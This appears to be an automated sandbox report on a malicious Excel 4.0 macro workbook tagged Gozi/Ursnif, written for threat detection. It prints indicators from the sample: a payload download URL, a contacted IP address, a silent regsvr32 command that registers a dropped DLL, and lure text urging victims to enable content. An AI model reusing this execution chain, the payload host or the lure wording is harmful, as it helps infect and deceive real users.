Loading ...

Play interactive tourEdit tour

Analysis Report document-1393356833.xls

Overview

General Information

Sample Name:document-1393356833.xls
Analysis ID:324294
MD5:14868edc4a5e024fa9fa4099bfb9010e
SHA1:08c9a8b1663d6e02aa5265de51059ba6e17c5507
SHA256:448f1e86e4e8da6517e19da9f23577c5a84dd4f185049e74ab8c5becf571cd2f
Tags:goziSilentBuilderursnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Tries to load missing DLLs
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6060 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6348 cmdline: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1393356833.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x502a2:$s1: Excel
  • 0x5131d:$s1: Excel
  • 0x389b:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1393356833.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6060, ProcessCommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, ProcessId: 6348

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-1393356833.xlsVirustotal: Detection: 33%Perma Link

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: excel.exeMemory has grown: Private usage: 1MB later: 109MB
    Source: global trafficDNS query: name: dtmh.gr
    Source: global trafficTCP traffic: 192.168.2.3:49706 -> 78.46.235.88:443
    Source: global trafficTCP traffic: 192.168.2.3:49706 -> 78.46.235.88:443
    Source: Joe Sandbox ViewIP Address: 78.46.235.88 78.46.235.88
    Source: unknownDNS traffic detected: queries for: dtmh.gr
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://api.office.net
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://api.onedrive.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://augloop.office.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://autodiscover-s.outlook.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://cdn.entity.
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://cortana.ai
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://cr.office.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://directory.services.
    Source: document-1393356833.xlsString found in binary or memory: https://dtmh.gr/ds/231120.gif
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://graph.windows.net
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://graph.windows.net/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://login.windows.local
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://management.azure.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://management.azure.com/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://messaging.office.com/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://officeapps.live.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://onedrive.live.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://outlook.office.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://outlook.office365.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://settings.outlook.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://tasks.office.com
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 9FA1F744-8159-4D70-B39C-79B56408DE78.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
    Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
    Source: Screenshot number: 8Screenshot OCR: Enable Content ^ X J14 " i 7c v' J& A A B C D E E G H I K L I M I N I O I P I Q R S T " 301
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-1393356833.xlsInitial sample: CALL
    Source: document-1393356833.xlsInitial sample: CALL
    Source: document-1393356833.xlsInitial sample: CALL
    Source: document-1393356833.xlsInitial sample: CALL
    Source: document-1393356833.xlsInitial sample: EXEC
    Found obfuscated Excel 4.0 MacroShow sources
    Source: document-1393356833.xlsInitial sample: High usage of CHAR() function: 18
    Source: document-1393356833.xlsOLE indicator, VBA macros: true
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: document-1393356833.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal80.expl.evad.winXLS@3/6@1/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{FC706B40-321A-4497-9D65-085C0964098E} - OProcSessId.datJump to behavior
    Source: document-1393356833.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: document-1393356833.xlsVirustotal: Detection: 33%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
